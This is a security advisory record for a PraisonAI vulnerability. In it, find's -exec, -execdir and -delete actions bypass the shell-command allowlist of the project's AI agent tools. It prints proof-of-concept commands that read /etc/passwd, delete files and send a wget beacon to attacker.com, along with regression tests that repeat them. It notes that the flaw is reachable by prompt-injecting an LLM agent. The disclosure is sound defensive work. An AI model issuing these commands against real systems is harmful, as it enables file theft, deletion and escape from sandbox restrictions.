{"id":"CVE-2026-61434","aliases":["GHSA-cv3g-hj65-pcfh"],"title":"PraisonAI: Shell command allowlist bypass via find -exec built-in action","summary":"PraisonAI: Shell command allowlist bypass via find -exec built-in action","severity":"high","cvss":8.8,"cwe":["CWE-78","CWE-693"],"vendor":"praisonai","product":"praisonai","ecosystem":"pip","affected":["praisonai <= 4.6.77"],"patched":["praisonai 4.6.78"],"published":"2026-10-08","updated":"2026-10-08","sourceUpdated":"2026-10-08T22:00:56Z","source":"GHSA","sourceUrl":"https://github.com/advisories/GHSA-cv3g-hj65-pcfh","references":[{"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-cv3g-hj65-pcfh"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-61434"},{"url":"https://www.vulncheck.com/advisories/praisonai-before-allowlist-bypass-via-find-exec"},{"url":"https://github.com/advisories/GHSA-cv3g-hj65-pcfh"}],"tags":["ghsa","pip"],"epss":0.00877,"epssPercentile":0.57766,"ingestedAt":"2026-10-08T22:11:53.876Z","slug":"CVE-2026-61434","body":"## Overview\n\n### Summary\n\nThe shell command execution hardening introduced in PraisonAI npm 1.7.2 / Python 4.6.58 to fix GHSA-5jv7-2mjm-h6qj (utility-tools shell chaining) and GHSA-vjv9-7m7j-h833 (SandboxExecutor chaining) can be bypassed via `find`'s built-in `-exec` action.\n\nThe fix blocks shell metacharacters (`` ;|&`><$()${} ``) and uses `spawn()` with `shell: false`. However, `find` remains in the safe command allowlist, and its `-exec ... {} +` action executes commands without shell metacharacters — the `+` batch terminator replaces the blocked `;` terminator. The same gap exists in 4 parallel implementations (verified by source inspection of each).\n\n### Details\n\n**Root cause**: Each of the four implementations validates the **first token** of the command against an allowlist or blocklist, then passes the remaining tokens as arguments to `spawn()`/`subprocess.Popen()` with `shell: false`. Shell metacharacter injection is indeed blocked.\n\nHowever, `find` is a Unix command with **built-in execution actions**: `-exec`, `-execdir`, `-delete`, `-ok`, `-okdir`. These actions are interpreted by `find` itself, not by the shell. They execute programs or delete files without shell metacharacters (verified: the payload `find /etc -name passwd -maxdepth 1 -execdir cat {} +` passes the regex at line 240 of utility-tools.ts):\n\n```\nfind /path -exec <command> {} +\n```\n\nThe `+` terminator (batch mode) avoids `;` which IS blocked by the metacharacter regex.\n\n**Affected components** (4 implementations, same gap):\n\n| # | Component | File | Gap |\n|---|---|---|---|\n| 1 | TS utility-tools `shell()` | `src/praisonai-ts/src/tools/utility-tools.ts:255` | `find` in `safeCommands` allowlist |\n| 2 | TS SandboxExecutor | `src/praisonai-ts/src/cli/features/sandbox-executor.ts:30-50` | `find` absent from `DEFAULT_BLOCKED_COMMANDS` |\n| 3 | Python `safe_shell` | `src/praisonai/praisonai/cli/features/safe_shell.py:22-58` | `find` absent from `BANNED_COMMANDS`, present in `SAFE_COMMANDS` |\n| 4 | Python `sandbox_executor` | `src/praisonai/praisonai/cli/features/sandbox_executor.py:87-91` | `find` absent from `blocked_commands` |\n\n**Bypass analysis**:\n\n| Check | `find /etc -name passwd -maxdepth 1 -execdir cat {} +` | Result |\n|---|---|---|\n| Metachar regex `/[;|&\\`><]/` | `{`, `}`, `+` are not in regex | PASS |\n| Regex `/\\$\\([^)]*\\)/` | No `$(...)` | PASS |\n| `safeCommands.includes('find')` | `find` IS in allowlist | PASS |\n| SandboxExecutor blocked paths | `normalized.includes('/etc/passwd')` → FALSE (path split: `/etc ` + `passwd`) | PASS |\n| `spawn('find', [...], {shell:false})` | find interprets `-execdir` internally | BYPASS |\n\nThe `-execdir` technique also evades the SandboxExecutor's substring-based path restriction: `/etc` and `passwd` appear as separate arguments, so `/etc/passwd` never appears as a contiguous substring of the command string.\n\n**Preconditions**:\n\n| Precondition | How attacker obtains | Default? |\n|---|---|---|\n| Access to `shell()` or SandboxExecutor | Default built-in tool in the npm agent toolkit; reachable via prompt injection | Y |\n| `find` binary on target | Standard Unix utility, present on Linux/macOS | Y |\n| `find` in allowlist / absent from blocklist | Default configuration in each implementation | Y |\n\n### PoC\n\n**1. Data exfiltration via -execdir (utility-tools.ts)**\n\n```javascript\nconst { shell } = require('praisonai/dist/tools/utility-tools');\n\nasync function poc() {\n    // Control: direct 'wget' is rejected (not in safeCommands)\n    const control = await shell('wget http://example.com');\n    console.log('[CONTROL] rejected:', !control.success);  // true\n\n    // Bypass: find -execdir reads /etc/passwd via find's built-in action\n    const bypass = await shell('find /etc -name passwd -maxdepth 1 -execdir cat {} +');\n    console.log('[BYPASS]:', bypass.success);  // true\n    console.log(bypass.data);  // root:x:0:0:root:/root:/bin/bash ...\n}\npoc();\n```\n\nCode path: `safeCommands.includes('find')` → true → `containsShellMetacharacters(...)` → false → `spawn('find', ['/etc','-name','passwd','-maxdepth','1','-execdir','cat','{}','+'], {shell:false})` → find chdirs to /etc → `cat ./passwd` → exit 0 → `{success: true, data: \"<passwd contents>\"}`.\n\n**2. File deletion**\n\n```javascript\nawait shell('find /app/uploads -name \"*.bak\" -delete');\n// -delete is a find built-in — clean exit 0, files deleted\n```\n\n**3. Non-allowlisted command (side-effect based)**\n\n```javascript\nawait shell('find /tmp -maxdepth 0 -exec wget -q http://attacker.com/beacon {} +');\n// HTTP request fires as side effect before find returns non-zero\n```\n\n**4. Python safe_shell**\n\n```python\nfrom praisonai.cli.features.safe_shell import safe_execute\n\nresult = safe_execute(\"find /etc -name passwd -maxdepth 1 -execdir cat {} +\")\nprint(result.stdout)  # root:x:0:0:root:/root:/bin/bash ...\n```\n\n### Impact\n\nAn attacker who can influence the command parameter of `shell()` (via prompt injection directing an LLM agent, or direct API input to SandboxExecutor) achieves:\n\n- **Blocked file read**: `-execdir` reads files in `DEFAULT_BLOCKED_PATHS` by splitting the path across arguments (verified: exit 0, data returned)\n- **File deletion**: `-delete` destroys files without metacharacters (verified: clean exit 0)\n- **Non-allowlisted command execution**: `-exec` runs commands not in safeCommands (side effect fires regardless of exit code)\n\nShell substitution (`$(...)`) IS blocked, so the bypass is limited to executing binaries already on disk — but this includes `cat`, `chmod`, `python3`, `curl` etc.\n\nSame severity class as GHSA-5jv7-2mjm-h6qj / GHSA-vjv9-7m7j-h833.\n\n### Suggested fix\n\n**Option A**: Remove `find` from each safe/allowed command list (4 locations). Simplest fix.\n\n**Option B**: If `find` must remain, parse arguments and reject `-exec`, `-execdir`, `-delete`, `-fls`, `-fprint`, `-fprintf`, `-ok`, `-okdir` flags.\n\n**Regression tests**:\n```typescript\ntest('rejects find -exec', async () => {\n    expect((await shell('find /tmp -maxdepth 0 -exec wget http://x.com {} +')).success).toBe(false);\n});\ntest('rejects find -execdir', async () => {\n    expect((await shell('find /etc -name passwd -maxdepth 1 -execdir cat {} +')).success).toBe(false);\n});\ntest('rejects find -delete', async () => {\n    expect((await shell('find /app -name \"*.bak\" -delete')).success).toBe(false);\n});\n```\n\n### References\n\n- GHSA-5jv7-2mjm-h6qj: Utility shell safe-command wrapper allowlist bypass via shell chaining (High 8.8)\n- GHSA-vjv9-7m7j-h833: SandboxExecutor allowedCommands bypass via shell chaining (High)\n- Fix commits: 2adfe7e, 2f9677a (2026-06-13)\n\n## Affected packages\n\n- `praisonai <= 4.6.77`\n\n## Remediation\n\nUpgrade to a patched release:\n\n- `praisonai 4.6.78`","depth":"twilight","depthScore":49,"depthScoreParts":{"impact":48.4,"likelihood":0.2,"exploitation":0,"ransomware":0},"changes":[]}